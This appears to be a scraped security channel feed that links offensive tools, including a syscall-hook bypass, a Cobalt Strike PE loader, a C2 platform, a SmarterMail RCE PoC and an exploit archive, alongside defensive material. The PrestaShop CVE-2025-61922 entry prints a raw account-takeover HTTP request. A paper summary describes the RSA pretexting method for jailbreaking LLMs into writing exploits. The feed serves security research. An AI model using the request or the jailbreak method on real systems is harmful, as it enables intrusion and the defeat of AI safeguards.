open-redirect-payload-list
#security #payload #websec #openredirect @reconcore
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
#security #payload #websec #openredirect @reconcore
LLMs_for_Vulnerability_Exploitation_in_Enterprise_Software.pdf
3.5 MB
From Rookie to Expert: Manipulating LLMs for Automated Vulnerability Exploitation in Enterprise Software Dec. 2025.
#llm #redteam @reconcore
We show in this work how publicly available LLMs can be socially engineered to transform novices into capable attackers, challenging the foundational principle that exploitation requires technical expertise. To that end, we propose RSA (Role-assignment, Scenario-pretexting, and Action-solicitation), a pretexting strategy that manipulates LLMs into generating functional exploits despite their safety mechanisms
#llm #redteam @reconcore
From Code to Coverage:
The OID Transformation That Hinders LDAP Detection part one
The Whitespace Nightmare: Writing Sigma Rules That Actually Match part two
#blueteam #ldap #dfir #technique @reconcore
The OID Transformation That Hinders LDAP Detection part one
..we learned to think like an attacker—understanding how Impacket tools construct their LDAP queries
The Whitespace Nightmare: Writing Sigma Rules That Actually Match part two
..we learned to think like a log parser having an existential crisis - handling every possible variation those queries might take after going through the transformation gauntlet
#blueteam #ldap #dfir #technique @reconcore
GhostlyHollowingViaTamperedSyscalls2
This implementation utilizes two techniques covered in the recent updates to the Maldev Academy course:
#technique #injection #bypass #syscall #invoke #spoof #pe @reconcore
This implementation utilizes two techniques covered in the recent updates to the Maldev Academy course:
Tampered Syscalls Via Hardware BreakPoints: Used to bypass userland hooks while simultaneously spoofing the invoked syscall's arguments.
Ghostly Hollowing: A hybrid technique between Process Hollowing and Process Ghosting.
#technique #injection #bypass #syscall #invoke #spoof #pe @reconcore
wmie WMI Explorer
@reconcore
A modern Windows desktop application for exploring and managing Windows Management Instrumentation (WMI) namespaces, classes, instances, properties, and methods. Built with WPF and .NET 8.0.
@reconcore
profilehound
#ad #bloodhound #pentest #tools #redteam @reconcore
ProfileHound - BloodHound OpenGraph collector for user profiles stored on domain machines. Make informed decisions about looting secrets by identifying active user profiles on domain machines.
#ad #bloodhound #pentest #tools #redteam @reconcore
BOF_RunPe
#python #windows #automation #scripts #incident #response #re #hunting #tools #malware #analysis #forensics #security #bof #pe #runpe #exploit #dev @reconcore
Execute PE files in-memory using Cobalt Strike's Beacon, eliminating child processes and consoles for stealthy operations and efficient output handling.
#python #windows #automation #scripts #incident #response #re #hunting #tools #malware #analysis #forensics #security #bof #pe #runpe #exploit #dev @reconcore
CVE-2025-52691 PoC: SmarterMail Arbitrary File Upload RCE (APT-Enhanced)
#apt #cve #poc #rce @reconcore
An enhanced proof-of-concept exploit for CVE-2025-52691 (SmarterMail Arbitrary File Upload RCE) with APT-level features like stealth obfuscation, persistence, exfiltration, and interactive mode. For educational and authorized testing only. Credits to the original PoC by yt2w/CVE-2025-52691.
#apt #cve #poc #rce @reconcore
GitHub
GitHub - DeathShotXD/CVE-2025-52691-APT-PoC: An enhanced proof-of-concept exploit for CVE-2025-52691 (SmarterMail Arbitrary File…
An enhanced proof-of-concept exploit for CVE-2025-52691 (SmarterMail Arbitrary File Upload RCE) with APT-level features like stealth obfuscation, persistence, exfiltration, and interactive mode. Fo...
CVE-2025-68860
#vulnerability #cve #wordpress @reconcore
WordPress Mobile builder Plugin <= 1.4.2 is vulnerable to a high priority Broken Authentication
#vulnerability #cve #wordpress @reconcore
GitHub
GitHub - Nxploited/CVE-2025-68860: WordPress Mobile builder Plugin <= 1.4.2 is vulnerable to a high priority Broken Authentication
WordPress Mobile builder Plugin <= 1.4.2 is vulnerable to a high priority Broken Authentication - Nxploited/CVE-2025-68860
ThreatActors-TTPs
#technique #malware #ransomware #ttp #mitre #ransomware @reconcore
Repository created to share information about tactics, techniques and procedures used by threat actors. Initially with ransomware groups and evolving to other types of threats.
#technique #malware #ransomware #ttp #mitre #ransomware @reconcore
🔥1
intercept Signal Intelligence Platform
#tools #intelligence #signal @reconcore
A sleek, modern web-based front-end for signal intelligence tools.
Unified interface for pager decoding, 433MHz sensors, ADS-B aircraft tracking, satellite monitoring, WiFi reconnaissance, and Bluetooth scanning.
#tools #intelligence #signal @reconcore
❤1
CVE-2025-61922: Zero-Click Account Takeover on Prestashop
9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
Shodan:
#vulnerability #research #cve #zeroclick #poc @reconcore
9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: localhost:3000
Content-Length: 72
{"orderID":"1","order":{"payer":{"email_address":"presta@example.com"}}}
Shodan:
/search?query=prestashop#vulnerability #research #cve #zeroclick #poc @reconcore
race-toolkit Communicate with Airoha-based Bluetooth devices using the RACE protocol via Bluetooth and USB.
CVE-2025-20700 CVE-2025-20701 CVE-2025-20702
#tools #transport #protocol #offensivesecurity @reconcore
CVE-2025-20700 CVE-2025-20701 CVE-2025-20702
RACE Toolkit is the tool released alongside our Airoha research. You can find more about that in our blog post.
This repository contains a Python-based command-line toolkit for interacting with devices that expose the RACE protocol over various transports (BLE GATT, Bluetooth Classic RFCOMM, USB HID). It is primarily intended for further security research into the Airoha ecosystem and for end-users to check whether their devices are affected by the vulnerabilities.
#tools #transport #protocol #offensivesecurity @reconcore
GitHub
GitHub - auracast-research/race-toolkit: Communicate with Airoha-based Bluetooth devices using the RACE protocol via Bluetooth…
Communicate with Airoha-based Bluetooth devices using the RACE protocol via Bluetooth and USB. - auracast-research/race-toolkit
PowerShell Script:
(2026-01-01) PowerShell Script To Reset The KrbTgt Account Password/Keys For Both RWDCs And RODCs (Update 8)
#powershell #script @reconcore
(2026-01-01) PowerShell Script To Reset The KrbTgt Account Password/Keys For Both RWDCs And RODCs (Update 8)
#powershell #script @reconcore
Jorge's Quest For Knowledge!
(2026-01-01) PowerShell Script To Reset The KrbTgt Account Password/Keys For Both RWDCs And RODCs (Update 8)
The famous PowerShell script to reset the password of all KRBTGT accounts of DCs (!) found in an AD domain, either automatically or on demand.
❤1
ZeroPulse: Modern Command & Control (C2) Platform with Cloudflare Tunnel Integration
#javascript #python #ssh #backdoor #powershell #cloudflare #rat #pentest #postexploitation #winrm #linux #kali #c2 #redteam #commandandcontrol #fastapi #framework @reconcore
Modern C2 Platform with Cloudflare Tunnel Integration | WinRM & SSH Remote Management | Real-time Terminal & Remote Desktop | Built with FastAPI & React
#javascript #python #ssh #backdoor #powershell #cloudflare #rat #pentest #postexploitation #winrm #linux #kali #c2 #redteam #commandandcontrol #fastapi #framework @reconcore
exploits_2025.tgz
287.9 MB
Complete comprehensive archive of all 1558 exploits added to Packet Storm in 2025.
#exploit @reconcore
#exploit @reconcore
MSFinger: Microsoft Network Service Fingerprinting Tool
secorizon.com/
#ldap #smb #protocol @reconcore
secorizon.com/
MSFinger is a high-performance network fingerprinting tool designed for internal network reconnaissance. It rapidly identifies Microsoft services, detects security configurations, and highlights potential vulnerabilities across SMB, LDAP, and LDAPS protocols.
#ldap #smb #protocol @reconcore
GitHub
GitHub - secorizon/MSFinger: Microsoft Network Service Fingerprinting Tool
Microsoft Network Service Fingerprinting Tool. Contribute to secorizon/MSFinger development by creating an account on GitHub.